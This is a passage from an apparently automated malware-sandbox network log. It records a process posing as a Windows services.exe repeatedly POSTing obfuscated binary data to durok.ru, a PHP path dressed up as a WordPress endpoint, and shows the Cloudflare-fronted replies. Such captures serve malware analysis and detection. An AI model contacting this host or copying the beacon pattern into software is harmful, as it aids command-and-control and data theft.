                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RehnYcQihK32L48Zc7OtMzNRgz%2FXioi6Gbfyn9%2BZHPOqo8scQKfkI%2FMcd%2Bt%2BcaHKIlhTse2tU%2BMxFgtT3bLLYgr6aFZqOQp4UtNi%2BLETlriVLH6dZNaJuwbwGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82620b5f649e17-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3445&min_rtt=1987&rtt_var=3661&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=106936&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              32192.168.2.449773104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:46.330280066 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:46.677308083 CET2128OUTData Raw: 59 51 5e 5d 54 5b 5c 56 5e 58 52 54 56 5c 58 56 54 50 5b 59 56 51 53 54 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YQ^]T[\V^XRTV\XVTP[YVQSTPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'<4Z("!" X,X&)&Z3#,U 2-:B<3 *"Z.#Z*2
                                                                                                                              Dec 26, 2024 17:17:47.507642984 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:47.762006998 CET951INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:47 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GH4trDAJkoJNlZnPUPbXXF6%2BCbHjBg7hXRkmOK83olUjJDSyzFn%2FxXNO%2Fqn5Nj8%2FyVJEM7vFcQCubWc%2Bsw%2B9RUTdcoNDku7RBQ5knRzfW2wXZQBmq6PKfjMukA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82620eec5e0f75-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4169&min_rtt=1721&rtt_var=5543&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=68509&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 58 2a 17 0d 50 23 05 28 56 2b 3d 2a 19 28 32 32 06 3c 1c 32 07 2b 01 25 0a 28 2b 28 0a 37 5c 31 05 29 29 3c 10 26 35 39 00 31 0b 2e 5c 05 1d 27 5f 2b 3b 33 02 27 22 3e 00 2b 3e 3a 40 29 00 18 05 24 01 23 58 23 15 3d 04 37 31 24 58 2c 05 37 02 2d 02 01 06 2b 30 0f 04 21 07 21 51 0c 1f 38 56 21 17 28 07 27 3e 21 54 20 30 3f 12 25 28 22 10 21 2b 37 50 26 2a 27 5b 32 20 3b 54 23 2e 27 1f 2b 2e 3e 5f 32 11 3d 5d 29 39 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$X*P#(V+=*(22<2+%(+(7\1))<&591.\'_+;3'">+>:@)$#X#=71$X,7-+0!!Q8V!('>!T 0?%("!+7P&*'[2 ;T#.'+.>_2=])9%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              33192.168.2.449774104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:47.437378883 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:47.786729097 CET2548OUTData Raw: 59 5b 5e 5d 51 5c 59 53 5e 58 52 54 56 58 58 5b 54 54 5b 54 56 56 53 58 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y[^]Q\YS^XRTVXX[TT[TVVSXPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'(24[<=W"T;8>%$'X7<? Z2.:? _="Z.#Z*"
                                                                                                                              Dec 26, 2024 17:17:48.620069027 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:48.869940996 CET805INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:48 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qzZEU6cryNaNy76CT9tXnlyd%2B3%2B4MBs%2FfI%2FDOWycBmk6gxtpC%2FcUhqlH95ESCKX4MPd5gXml%2FP9I0Rkm00oaywDJrPcmLcNVmepD%2BxtIdFQUbMbK0ZQ0gVMJvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826215c93f0f63-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8296&min_rtt=1669&rtt_var=13880&sent=5&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=26697&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              34192.168.2.449775104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:48.892041922 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2116
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:49.239886999 CET2116OUTData Raw: 5c 5b 5e 5d 51 5c 59 5a 5e 58 52 54 56 59 58 54 54 53 5b 5c 56 51 53 5a 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \[^]Q\YZ^XRTVYXTTS[\VQSZPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$+1'(9"$X8X6=0+44<2Z::3(])"Z.#Z*
                                                                                                                              Dec 26, 2024 17:17:50.068927050 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:50.321949005 CET945INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:50 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zJhhcj3LcWOqOslzEXjLp3%2BgasElfjLVMnukJw9fRzTYnFVI%2B7bKsGVJWZuHew%2Bwj6aeTtRtlbuUxbnOGHASSeOQujeITcee1S7nEQYph2F6pxyWlkWZ56LTIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82621eebf14374-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4295&min_rtt=1671&rtt_var=5876&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2423&delivery_rate=64407&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 05 3e 07 0d 53 20 5a 38 55 3c 03 2e 57 3d 21 0c 05 28 1c 07 5e 3c 2c 22 53 28 38 3f 1b 21 2a 2d 03 3e 39 20 11 32 08 26 11 26 31 2e 5c 05 1d 27 5d 2b 2b 30 5f 27 31 3e 06 3e 00 26 43 3d 3d 29 5a 27 3f 05 11 21 3b 2d 06 34 0f 34 5d 2c 5a 23 07 3a 5a 3f 07 3f 23 3e 5a 22 17 21 51 0c 1f 3b 0d 36 29 01 13 25 2d 35 1d 36 30 28 0d 25 38 2d 0a 35 02 38 0c 30 5c 3f 10 26 0a 3f 53 23 2d 3c 0d 2a 2e 2e 5a 26 3f 3e 04 29 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98'>S Z8U<.W=!(^<,"S(8?!*->9 2&&1.\']++0_'1>>&C==)Z'?!;-44],Z#:Z??#>Z"!Q;6)%-560(%8-580\?&?S#-<*..Z&?>))%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              35192.168.2.449776104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:49.107618093 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2544
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:49.458512068 CET2544OUTData Raw: 5c 5e 5e 5f 54 5c 59 57 5e 58 52 54 56 59 58 50 54 5c 5b 5b 56 52 53 5a 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \^^_T\YW^XRTVYXPT\[[VRSZPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$[(!#<_%W5,X**'>Z3'3 ,W <>9E+0Y>5"Z.#Z**
                                                                                                                              Dec 26, 2024 17:17:50.286545038 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:50.537935019 CET804INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:50 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k%2ByobGb%2Bla4GhSKpnjW%2BKljPo5ifh8F4bBNyYfeQkn7rxq%2FsZd3fuS%2FPKRfHusiDutrck1PnhYys9jABgVUOrqadGInMbiLh%2FZdw6kC6IwdqL%2FiuR6tdHxo5gQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262204819426d-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4861&min_rtt=2068&rtt_var=6361&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2851&delivery_rate=59804&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              36192.168.2.449777104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:50.815862894 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:51.181303978 CET2548OUTData Raw: 5c 59 5b 5a 51 5e 59 50 5e 58 52 54 56 51 58 55 54 56 5b 5c 56 51 53 5f 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \Y[ZQ^YP^XRTVQXUTV[\VQS_PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'+"0\<5#!<;>9*71$'Z4(U4Z>::4?V Y)5"Z.#Z*
                                                                                                                              Dec 26, 2024 17:17:51.957221031 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:52.220014095 CET794INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:52 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i3OrvA20%2FbkUH7uVWVfHLfBCh6CEpET6iHDofym2TUSFrCmSXpAT9pDFVbbdGK2mDAQzeVK7u7dADgETs%2BAaNCsvP8EUH82jFnCGigQn0l1oroQ5xNWOZDJTBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82622abadd43f8-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4648&min_rtt=1724&rtt_var=6495&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=58121&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              37192.168.2.449778104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:51.532876015 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2108
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:51.880644083 CET2108OUTData Raw: 59 5b 5e 51 51 5c 5c 57 5e 58 52 54 56 5a 58 55 54 57 5b 5a 56 50 53 55 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y[^QQ\\W^XRTVZXUTW[ZVPSUPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'++:"" ;."=4Y%'0 8Q"/>9<C> #="Z.#Z**
                                                                                                                              Dec 26, 2024 17:17:52.707736015 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:52.961911917 CET946INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:52 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NXg6sZbInOfNCJTn0Dx9WJdEcqlFRgCn2KSEBo7k8UwWxVR5TZ78bjHJpiuEr32dXw249hNRbwQogb%2FQpVasS5D61j7S9Q5pq70m3XSpLDoxjW2%2Fc6v7L6Qu%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82622f6b89558a-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8437&min_rtt=1593&rtt_var=14285&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2415&delivery_rate=25911&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 04 29 39 33 52 34 5a 28 1c 2b 04 3a 51 2a 32 21 1a 2b 0c 36 06 3f 01 3a 1d 2a 38 24 09 23 39 29 05 29 03 30 5d 25 18 36 12 31 0b 2e 5c 05 1d 27 14 3f 3b 20 58 27 1c 0f 13 29 10 0f 19 3d 2d 39 5e 27 01 05 5d 20 28 22 5a 20 57 3c 5b 2f 5a 20 13 2c 2c 3f 00 2b 23 26 5d 35 3d 21 51 0c 1f 38 52 21 00 27 11 31 10 35 1d 22 1e 23 50 26 3b 32 57 21 15 2f 1d 24 3a 3f 58 26 1d 20 0e 23 13 30 0e 28 3d 22 10 32 01 25 58 2a 03 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98')93R4Z(+:Q*2!+6?:*8$#9))0]%61.\'?; X')=-9^'] ("Z W<[/Z ,,?+#&]5=!Q8R!'15"#P&;2W!/$:?X& #0(="2%X*%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              38192.168.2.449779104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:52.478810072 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:52.833553076 CET2548OUTData Raw: 59 5b 5b 5b 54 5e 59 53 5e 58 52 54 56 5c 58 52 54 54 5b 5e 56 53 53 5f 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y[[[T^YS^XRTV\XRTT[^VSS_PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$])!0]<)-!//V=%4/X /8U7?9.0C?<X="Z.#Z*2
                                                                                                                              Dec 26, 2024 17:17:53.656728029 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:53.910047054 CET793INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:53 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g4AzGO0DmNbYkiw6pUCoGjzRMW3Vc8Cmr1Ls20HvJLRLiGMdrb2P3Wdc2uEFO48gsit6kLXgUr%2Bn401yDrH5PQWbebW4u8EoQ1ifayg57ZuDHl9CY3LITZPfqA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826235596242f2-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3135&min_rtt=1716&rtt_var=3481&sent=5&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=111723&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0
                                                                                                                              Dec 26, 2024 17:17:54.056976080 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2108
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:54.391046047 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:54.391237974 CET2108OUTData Raw: 5c 5c 5b 5b 51 5b 59 50 5e 58 52 54 56 5e 58 56 54 51 5b 5a 56 56 53 55 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \\[[Q[YP^XRTV^XVTQ[ZVVSUPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'?W#<!6+,2)B-$B ,#<=-$C+ ]="Z.#Z*
                                                                                                                              Dec 26, 2024 17:17:54.913439035 CET946INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:54 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVyOrgc3rIcuxFGi0youv6uyM0Jwqyo9sH29SKOTSFF7l0hu40OHkd%2FnjyUlXtnKQ2kBJcaaFp93ZsYGMmFlFi6FuUhOS0wdcQ5MfrVLMgDbhs8jFnl6fhidIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826239ee6042f2-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4261&min_rtt=1716&rtt_var=4795&sent=10&recv=12&lost=0&retrans=0&sent_bytes=843&recv_bytes=5270&delivery_rate=1620421&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 5a 29 39 06 0e 20 2f 2c 51 2a 3e 3a 53 2a 57 39 5f 3f 32 25 58 3f 01 0c 1e 3f 28 0a 0b 34 39 35 04 29 14 27 05 25 08 2e 1f 25 0b 2e 5c 05 1d 27 5c 28 15 0d 06 33 0c 25 12 3d 3e 22 42 3e 00 36 07 24 59 23 10 20 5d 29 05 23 1f 24 5a 3b 3c 2f 01 2d 05 34 5b 3c 0e 32 1f 21 07 21 51 0c 1f 3b 0c 36 39 3f 11 25 3d 39 54 21 23 27 54 26 16 2d 0f 36 3b 09 55 24 03 3c 04 32 0d 2b 52 37 3d 02 0d 2b 04 22 1d 26 3c 39 59 3d 39 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
